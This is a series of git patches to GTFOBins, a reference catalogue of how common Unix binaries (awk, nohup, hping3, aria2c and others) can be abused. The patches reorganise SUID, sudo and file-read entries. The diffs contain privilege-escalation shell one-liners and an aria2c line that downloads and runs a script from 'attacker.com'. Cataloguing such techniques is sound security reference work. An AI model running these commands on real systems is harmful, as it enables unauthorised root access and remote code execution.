From db40142ea7429b630d31469369653eb66da12ccc Mon Sep 17 00:00:00 2001 From: Shikata Date: Mon, 11 Jan 2021 12:31:54 +0200 Subject: [PATCH 01/20] Remove redundant sudo from SUID category --- _gtfobins/nohup.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/nohup.md b/_gtfobins/nohup.md index 6c75a80..2024e07 100644 --- a/_gtfobins/nohup.md +++ b/_gtfobins/nohup.md @@ -8,7 +8,7 @@ functions: nohup "$COMMAND" cat nohup.out sudo: - - code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)" + - code: nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)" suid: - code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)" --- From c4f93b87d5d09565213ffd52384d4f2ce1c165ea Mon Sep 17 00:00:00 2001 From: Shikata Date: Mon, 11 Jan 2021 12:37:37 +0200 Subject: [PATCH 02/20] Remove redundant lua -e from File Write and File Read categories in nmap --- _gtfobins/nmap.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md index ba93dde..6a76161 100644 --- a/_gtfobins/nmap.md +++ b/_gtfobins/nmap.md @@ -85,7 +85,7 @@ functions: file-write: - code: | TF=$(mktemp) - echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF + echo 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF nmap --script=$TF - description: The payload appears inside the regular nmap output. code: | @@ -94,7 +94,7 @@ functions: file-read: - code: | TF=$(mktemp) - echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF + echo 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF nmap --script=$TF sudo: - description: Input echo is disabled. From 9d1b86e9d3f0e37007a99009b29874c4628764c7 Mon Sep 17 00:00:00 2001 From: Shikata Date: Mon, 11 Jan 2021 12:56:13 +0200 Subject: [PATCH 03/20] Switch SUID to Limited SUID in lwp-request --- _gtfobins/lwp-request.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/lwp-request.md b/_gtfobins/lwp-request.md index aaa7476..8bf0677 100644 --- a/_gtfobins/lwp-request.md +++ b/_gtfobins/lwp-request.md @@ -4,7 +4,7 @@ functions: - code: | LFILE=file_to_read lwp-request "file://$LFILE" - suid: + limited-suid: - code: | LFILE=file_to_read ./lwp-request "file://$LFILE" From 05a9ae111b4c65891808b3fb3ef47edf56577085 Mon Sep 17 00:00:00 2001 From: Shikata Date: Mon, 11 Jan 2021 13:02:11 +0200 Subject: [PATCH 04/20] Switch SUID to Limited SUID in hping3 --- _gtfobins/hping3.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/_gtfobins/hping3.md b/_gtfobins/hping3.md index cd50714..fecff81 100644 --- a/_gtfobins/hping3.md +++ b/_gtfobins/hping3.md @@ -4,12 +4,12 @@ functions: - code: | hping3 /bin/sh - suid: - - code: | - ./hping3 - /bin/sh sudo: - code: | sudo hping3 /bin/sh + limited-suid: + - code: | + ./hping3 + /bin/sh --- From c09b95053f8f99a99b2bfb19807e4284214a4d4c Mon Sep 17 00:00:00 2001 From: Shikata Date: Mon, 11 Jan 2021 13:02:54 +0200 Subject: [PATCH 05/20] Fixed order of Limited SUID category in lwp-request --- _gtfobins/lwp-request.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/_gtfobins/lwp-request.md b/_gtfobins/lwp-request.md index 8bf0677..baf0a4b 100644 --- a/_gtfobins/lwp-request.md +++ b/_gtfobins/lwp-request.md @@ -4,12 +4,12 @@ functions: - code: | LFILE=file_to_read lwp-request "file://$LFILE" - limited-suid: - - code: | - LFILE=file_to_read - ./lwp-request "file://$LFILE" sudo: - code: | LFILE=file_to_read sudo lwp-request "file://$LFILE" + limited-suid: + - code: | + LFILE=file_to_read + ./lwp-request "file://$LFILE" --- From 211edf746b31748113b3eb1ccec8fc78443656c0 Mon Sep 17 00:00:00 2001 From: Shikata Date: Mon, 11 Jan 2021 13:45:21 +0200 Subject: [PATCH 06/20] Switch SUID to Limited SUID in aria2c --- _gtfobins/aria2c.md | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/_gtfobins/aria2c.md b/_gtfobins/aria2c.md index d9fc451..5793b81 100644 --- a/_gtfobins/aria2c.md +++ b/_gtfobins/aria2c.md @@ -10,13 +10,6 @@ functions: aria2c --on-download-error=$TF http://x - description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID. code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa - suid: - - code: | - COMMAND='id' - TF=$(mktemp) - echo "$COMMAND" > $TF - chmod +x $TF - ./aria2c --on-download-error=$TF http://x sudo: - code: | COMMAND='id' @@ -24,4 +17,11 @@ functions: echo "$COMMAND" > $TF chmod +x $TF sudo aria2c --on-download-error=$TF http://x + limited-suid: + - code: | + COMMAND='id' + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + ./aria2c --on-download-error=$TF http://x --- From a48303c2b98f2090acd82121007e1218a98d35ec Mon Sep 17 00:00:00 2001 From: Shikata Date: Mon, 11 Jan 2021 16:18:18 +0200 Subject: [PATCH 07/20] Remove redundant sudo from SUID category in nohup --- _gtfobins/nohup.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/_gtfobins/nohup.md b/_gtfobins/nohup.md index 2024e07..ff669c2 100644 --- a/_gtfobins/nohup.md +++ b/_gtfobins/nohup.md @@ -7,8 +7,8 @@ functions: COMMAND='/usr/bin/id' nohup "$COMMAND" cat nohup.out - sudo: - - code: nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)" suid: - - code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)" + - code: nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)" + sudo: + - code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)" --- From fd719bb4b6b6d4a74e31c22091910d2dbccce148 Mon Sep 17 00:00:00 2001 From: Shikata Date: Tue, 12 Jan 2021 13:39:52 +0200 Subject: [PATCH 08/20] Add SUID category to awk --- _gtfobins/awk.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md index a131e09..6f53813 100644 --- a/_gtfobins/awk.md +++ b/_gtfobins/awk.md @@ -27,6 +27,10 @@ functions: - code: | LFILE=file_to_read awk '//' "$LFILE" + suid: + - code: | + LFILE=file_to_read + awk '//' "$LFILE" sudo: - code: sudo awk 'BEGIN {system("/bin/sh")}' limited-suid: From 47698d0cfbc28d6fed2eb71d51f9f8673d7d1b50 Mon Sep 17 00:00:00 2001 From: Shikata Date: Tue, 12 Jan 2021 13:44:19 +0200 Subject: [PATCH 09/20] Add SUID [file read] category to ed --- _gtfobins/ed.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md index 29735e9..656f7e0 100644 --- a/_gtfobins/ed.md +++ b/_gtfobins/ed.md @@ -17,6 +17,11 @@ functions: ed file_to_read ,p q + suid: + - code: | + ed file_to_read + ,p + q sudo: - code: | sudo ed From ae8271292a39072404d67e155cd6028561bb643f Mon Sep 17 00:00:00 2001 From: Shikata Date: Tue, 12 Jan 2021 13:50:43 +0200 Subject: [PATCH 10/20] Add SUID [file read] category to lua --- _gtfobins/lua.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/_gtfobins/lua.md b/_gtfobins/lua.md index 6686bf5..0e634cc 100644 --- a/_gtfobins/lua.md +++ b/_gtfobins/lua.md @@ -59,6 +59,8 @@ functions: - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);' file-read: - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' + suid: + - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' sudo: - code: sudo lua -e 'os.execute("/bin/sh")' limited-suid: From 28cc7ff7dabeed20f666f3d0eac4d9313df714c7 Mon Sep 17 00:00:00 2001 From: Shikata Date: Tue, 12 Jan 2021 13:57:34 +0200 Subject: [PATCH 11/20] Add SUID [file read] category to sqlite3 --- _gtfobins/sqlite3.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md index 12daa5b..95b0719 100644 --- a/_gtfobins/sqlite3.md +++ b/_gtfobins/sqlite3.md @@ -14,6 +14,14 @@ functions: .import $LFILE t SELECT * FROM t; EOF + suid: + - code: | + LFILE=file_to_read + sqlite3 << EOF + CREATE TABLE t(line TEXT); + .import $LFILE t + SELECT * FROM t; + EOF sudo: - code: sudo sqlite3 /dev/null '.shell /bin/sh' limited-suid: From 561a5b2c9a89c74cf2d4c03f79dba1191d1887bd Mon Sep 17 00:00:00 2001 From: Shikata Date: Wed, 13 Jan 2021 11:22:26 +0200 Subject: [PATCH 12/20] Remove trailing space in awk.md line 31 --- _gtfobins/awk.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md index 6f53813..743d5bb 100644 --- a/_gtfobins/awk.md +++ b/_gtfobins/awk.md @@ -28,7 +28,7 @@ functions: LFILE=file_to_read awk '//' "$LFILE" suid: - - code: | + - code: | LFILE=file_to_read awk '//' "$LFILE" sudo: From b43f418ddb9819763e2d73da7e9dda62bd262fed Mon Sep 17 00:00:00 2001 From: Nick Blekherman Date: Mon, 18 Jan 2021 09:36:35 +0200 Subject: [PATCH 13/20] Add ./ to SUID category in nohup.mp --- _gtfobins/nohup.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/nohup.md b/_gtfobins/nohup.md index ff669c2..cc1a8cb 100644 --- a/_gtfobins/nohup.md +++ b/_gtfobins/nohup.md @@ -8,7 +8,7 @@ functions: nohup "$COMMAND" cat nohup.out suid: - - code: nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)" + - code: ./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)" sudo: - code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)" --- From 646ea8132e6761087f7f70f47f6cceada97515f6 Mon Sep 17 00:00:00 2001 From: Nick Blekherman Date: Mon, 18 Jan 2021 09:40:50 +0200 Subject: [PATCH 14/20] Revert limited-suid to suid and add -p in hping3 --- _gtfobins/hping3.md | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/_gtfobins/hping3.md b/_gtfobins/hping3.md index fecff81..a63760c 100644 --- a/_gtfobins/hping3.md +++ b/_gtfobins/hping3.md @@ -3,13 +3,9 @@ functions: shell: - code: | hping3 - /bin/sh + /bin/sh -p sudo: - code: | sudo hping3 /bin/sh - limited-suid: - - code: | - ./hping3 - /bin/sh --- From 3065294305ed8f6c452619f9e041b80fc13c2a31 Mon Sep 17 00:00:00 2001 From: Nick Blekherman Date: Mon, 18 Jan 2021 09:41:36 +0200 Subject: [PATCH 15/20] Add ./ to SUID category in ed.md --- _gtfobins/ed.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md index 656f7e0..b933fa2 100644 --- a/_gtfobins/ed.md +++ b/_gtfobins/ed.md @@ -19,7 +19,7 @@ functions: q suid: - code: | - ed file_to_read + ./ed file_to_read ,p q sudo: From 085e72a971a7692eb08d78d82f4f781ef6cc7bea Mon Sep 17 00:00:00 2001 From: Nick Blekherman Date: Mon, 18 Jan 2021 09:44:34 +0200 Subject: [PATCH 16/20] Add ./ to SUID category in awk.md --- _gtfobins/awk.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md index 743d5bb..aed6432 100644 --- a/_gtfobins/awk.md +++ b/_gtfobins/awk.md @@ -30,7 +30,7 @@ functions: suid: - code: | LFILE=file_to_read - awk '//' "$LFILE" + ./awk '//' "$LFILE" sudo: - code: sudo awk 'BEGIN {system("/bin/sh")}' limited-suid: From 31b69cfeed1a06a535201241af367a9b9c74aaa7 Mon Sep 17 00:00:00 2001 From: Nick Blekherman Date: Mon, 18 Jan 2021 09:46:51 +0200 Subject: [PATCH 17/20] Add SUID category to gawk as file read --- _gtfobins/gawk.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/_gtfobins/gawk.md b/_gtfobins/gawk.md index bf63ca8..dc398a6 100644 --- a/_gtfobins/gawk.md +++ b/_gtfobins/gawk.md @@ -27,6 +27,10 @@ functions: - code: | LFILE=file_to_read gawk '//' "$LFILE" + suid: + - code: | + LFILE=file_to_read + ./gawk '//' "$LFILE" sudo: - code: sudo gawk 'BEGIN {system("/bin/sh")}' limited-suid: From c293ed20f7516f679a0c58e8c963358685a4e6b0 Mon Sep 17 00:00:00 2001 From: Nick Blekherman Date: Mon, 18 Jan 2021 09:48:12 +0200 Subject: [PATCH 18/20] Add SUID category to mawk as file read --- _gtfobins/mawk.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/_gtfobins/mawk.md b/_gtfobins/mawk.md index fcaf868..0ff4b49 100644 --- a/_gtfobins/mawk.md +++ b/_gtfobins/mawk.md @@ -10,6 +10,10 @@ functions: - code: | LFILE=file_to_read mawk '//' "$LFILE" + suid: + - code: | + LFILE=file_to_read + ./mawk '//' "$LFILE" sudo: - code: sudo mawk 'BEGIN {system("/bin/sh")}' limited-suid: From d6d3563e5d8646f32e4816cf240804a8b50e23ea Mon Sep 17 00:00:00 2001 From: Nick Blekherman Date: Mon, 18 Jan 2021 09:49:07 +0200 Subject: [PATCH 19/20] Add SUID category to nawk as file read --- _gtfobins/nawk.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/_gtfobins/nawk.md b/_gtfobins/nawk.md index 9dc77fa..8663a76 100644 --- a/_gtfobins/nawk.md +++ b/_gtfobins/nawk.md @@ -27,6 +27,10 @@ functions: - code: | LFILE=file_to_read nawk '//' "$LFILE" + suid: + - code: | + LFILE=file_to_read + ./nawk '//' "$LFILE" sudo: - code: sudo nawk 'BEGIN {system("/bin/sh")}' limited-suid: From c85513d5a66e61855cc48fc036ec5d7a06624ee8 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Mon, 18 Jan 2021 09:19:35 +0100 Subject: [PATCH 20/20] Fix hping3 SUID --- _gtfobins/hping3.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/_gtfobins/hping3.md b/_gtfobins/hping3.md index a63760c..f66954f 100644 --- a/_gtfobins/hping3.md +++ b/_gtfobins/hping3.md @@ -3,6 +3,10 @@ functions: shell: - code: | hping3 + /bin/sh + suid: + - code: | + ./hping3 /bin/sh -p sudo: - code: |